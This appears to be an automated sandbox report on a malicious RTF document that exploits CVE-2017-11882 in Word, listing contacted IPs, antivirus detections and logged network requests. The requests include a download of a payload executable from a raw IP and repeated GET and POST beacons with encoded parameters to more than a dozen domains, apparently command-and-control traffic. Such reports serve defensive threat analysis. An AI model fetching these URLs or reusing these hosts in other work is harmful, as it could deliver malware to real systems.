Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 9, 2021, 11:32 a.m. | April 9, 2021, 11:34 a.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\................................................................................dot
3324
IP Address | Status | Action |
---|---|---|
107.180.43.16 | Active | Moloch |
154.86.211.231 | Active | Moloch |
164.124.101.2 | Active | Moloch |
164.132.235.17 | Active | Moloch |
172.217.25.14 | Active | Moloch |
192.0.78.24 | Active | Moloch |
195.201.179.80 | Active | Moloch |
198.54.117.244 | Active | Moloch |
209.99.40.222 | Active | Moloch |
23.107.250.219 | Active | Moloch |
23.95.122.24 | Active | Moloch |
34.102.136.180 | Active | Moloch |
50.87.195.61 | Active | Moloch |
52.15.160.167 | Active | Moloch |
67.225.129.56 | Active | Moloch |
91.195.240.94 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://23.95.122.24/zyo/vbc.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.thechilldrengang.com/nnmd/?Ajn=Qm+zDj4f4RLuzqptG8COn+B+brI1CpB9wHw121EclcSQGwPEjyrk1ZHI0LfP5GMpxTTOLxvE&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.dream-e-mail.com/nnmd/?Ajn=GDNzUjFbUW1WpVH7wCb7N3BoG8g8NpYy+xvVu1J5yu1tN7UOoDiMgA12mZMJcf0xYUEJW7jx&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.topmejoresproductos.com/nnmd/?Ajn=5oGfYuXOY9e6Wgzyw65MR7pWmotIxUI2yZPS8hwMrcBGefCHV1tZ9t+5FZg010TA0GKtEOYf&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.winnijermaynezigmund.site/nnmd/?Ajn=N2I1yTk+m5kpahBRa8KKuG/S0eEJEgSw239Z/a58dxU5l2G0s9OUHiRItD8O8JZ1353ED8ed&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.blackmantech.fitness/nnmd/?Ajn=lO2MoVQRnuQliAFYE73xMyvXdf5GkN1z0aKfIeNynRlJRWydjj13mXpuZu0yLgH94KMPbX89&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.raison-sociale.com/nnmd/?Ajn=P1LpRENdnqb1fbOGyNga4nCXTVuCGTreTbOaFjWN+nixYx/3vSvBuhMK5uJ9XJmSyj6SVpMN&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.regalparkllc.com/nnmd/?Ajn=tTl8v8g2q+7FzdYz1UQNVvYPTgelaUE7gW7tW0qfdn51WjA1prpQnhugYZXHkQH8F1WTaXCY&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.syduit.com/nnmd/?Ajn=btHTA+j+pbtfXH5E0zmzPQOf49f/oMdnjHUIX6frz8d7so2A3ybxPAuEpf9zLJV/bTrkMS/E&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.partapprintercare.com/nnmd/?Ajn=3phtZ1zyTDnz2WU83f8ON1haRiqj6XFttO8huOGvsDIOA2gUzVx9KnrUfWHFG6Oh1DS0eFgG&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.elpis-catering.com/nnmd/?Ajn=0Ts1VGxpsMxFhohnYcmQwyVTyV70cpoMLj6MACjr+zVW8ucMOFGWLmSRW6U63/nNCvV4KGuc&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.vegrebel.com/nnmd/?Ajn=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.ueoxx.com/nnmd/?Ajn=tRQiX2tnIcR1+0C/rREkw+oZ8fYp7zrYt8/OoSFyZqkjizznZx3g6RXGoToit+qONbwCpa2o&ndndsZ=KdvDNnE0J8D8 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.scott-re.online/nnmd/?Ajn=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&ndndsZ=KdvDNnE0J8D8 |
request | GET http://23.95.122.24/zyo/vbc.exe |
request | POST http://www.thechilldrengang.com/nnmd/ |
request | GET http://www.thechilldrengang.com/nnmd/?Ajn=Qm+zDj4f4RLuzqptG8COn+B+brI1CpB9wHw121EclcSQGwPEjyrk1ZHI0LfP5GMpxTTOLxvE&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.dream-e-mail.com/nnmd/ |
request | GET http://www.dream-e-mail.com/nnmd/?Ajn=GDNzUjFbUW1WpVH7wCb7N3BoG8g8NpYy+xvVu1J5yu1tN7UOoDiMgA12mZMJcf0xYUEJW7jx&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.topmejoresproductos.com/nnmd/ |
request | GET http://www.topmejoresproductos.com/nnmd/?Ajn=5oGfYuXOY9e6Wgzyw65MR7pWmotIxUI2yZPS8hwMrcBGefCHV1tZ9t+5FZg010TA0GKtEOYf&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.winnijermaynezigmund.site/nnmd/ |
request | GET http://www.winnijermaynezigmund.site/nnmd/?Ajn=N2I1yTk+m5kpahBRa8KKuG/S0eEJEgSw239Z/a58dxU5l2G0s9OUHiRItD8O8JZ1353ED8ed&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.blackmantech.fitness/nnmd/ |
request | GET http://www.blackmantech.fitness/nnmd/?Ajn=lO2MoVQRnuQliAFYE73xMyvXdf5GkN1z0aKfIeNynRlJRWydjj13mXpuZu0yLgH94KMPbX89&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.raison-sociale.com/nnmd/ |
request | GET http://www.raison-sociale.com/nnmd/?Ajn=P1LpRENdnqb1fbOGyNga4nCXTVuCGTreTbOaFjWN+nixYx/3vSvBuhMK5uJ9XJmSyj6SVpMN&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.regalparkllc.com/nnmd/ |
request | GET http://www.regalparkllc.com/nnmd/?Ajn=tTl8v8g2q+7FzdYz1UQNVvYPTgelaUE7gW7tW0qfdn51WjA1prpQnhugYZXHkQH8F1WTaXCY&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.syduit.com/nnmd/ |
request | GET http://www.syduit.com/nnmd/?Ajn=btHTA+j+pbtfXH5E0zmzPQOf49f/oMdnjHUIX6frz8d7so2A3ybxPAuEpf9zLJV/bTrkMS/E&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.partapprintercare.com/nnmd/ |
request | GET http://www.partapprintercare.com/nnmd/?Ajn=3phtZ1zyTDnz2WU83f8ON1haRiqj6XFttO8huOGvsDIOA2gUzVx9KnrUfWHFG6Oh1DS0eFgG&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.elpis-catering.com/nnmd/ |
request | GET http://www.elpis-catering.com/nnmd/?Ajn=0Ts1VGxpsMxFhohnYcmQwyVTyV70cpoMLj6MACjr+zVW8ucMOFGWLmSRW6U63/nNCvV4KGuc&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.vegrebel.com/nnmd/ |
request | GET http://www.vegrebel.com/nnmd/?Ajn=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.ueoxx.com/nnmd/ |
request | GET http://www.ueoxx.com/nnmd/?Ajn=tRQiX2tnIcR1+0C/rREkw+oZ8fYp7zrYt8/OoSFyZqkjizznZx3g6RXGoToit+qONbwCpa2o&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.scott-re.online/nnmd/ |
request | GET http://www.scott-re.online/nnmd/?Ajn=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&ndndsZ=KdvDNnE0J8D8 |
request | POST http://www.thechilldrengang.com/nnmd/ |
request | POST http://www.dream-e-mail.com/nnmd/ |
request | POST http://www.topmejoresproductos.com/nnmd/ |
request | POST http://www.winnijermaynezigmund.site/nnmd/ |
request | POST http://www.blackmantech.fitness/nnmd/ |
request | POST http://www.raison-sociale.com/nnmd/ |
request | POST http://www.regalparkllc.com/nnmd/ |
request | POST http://www.syduit.com/nnmd/ |
request | POST http://www.partapprintercare.com/nnmd/ |
request | POST http://www.elpis-catering.com/nnmd/ |
request | POST http://www.vegrebel.com/nnmd/ |
request | POST http://www.ueoxx.com/nnmd/ |
request | POST http://www.scott-re.online/nnmd/ |
filetype_details | Rich Text Format data, unknown version | filename | ................................................................................dot |
host | 172.217.25.14 | |||
host | 23.95.122.24 |
MicroWorld-eScan | Exploit.RTF-ObfsObjDat.Gen |
FireEye | Exploit.RTF-ObfsObjDat.Gen |
CAT-QuickHeal | Exp.RTF.Obfus.Gen |
McAfee | RTFObfustream.c!40F03856876F |
Sangfor | Exploit.Generic-Script.Save.e1f6df4c |
Arcabit | Exploit.RTF-ObfsObjDat.Gen |
Symantec | Bloodhound.RTF.20 |
ESET-NOD32 | multiple detections |
Cynet | Malicious (score: 70) |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Exploit.RTF-ObfsObjDat.Gen |
NANO-Antivirus | Exploit.Rtf.Heuristic-rtf.dinbqn |
Ad-Aware | Exploit.RTF-ObfsObjDat.Gen |
Emsisoft | Exploit.RTF-ObfsObjDat.Gen (B) |
TrendMicro | HEUR_RTFMALFORM |
Avira | HEUR/Rtf.Malformed |
MAX | malware (ai score=83) |
GData | Exploit.RTF-ObfsObjDat.Gen |
AhnLab-V3 | RTF/Malform-A.Gen |
ALYac | Exploit.RTF-ObfsObjDat.Gen |
TACHYON | Trojan-Exploit/RTF.CVE-2017-11882 |
Zoner | Probably Heur.RTFBadVersion |
Ikarus | Exploit.CVE-2017-11882 |
Fortinet | RTF/CVE_2017_11882.C!exploit |
Qihoo-360 | susp.rtf.objupdate.c |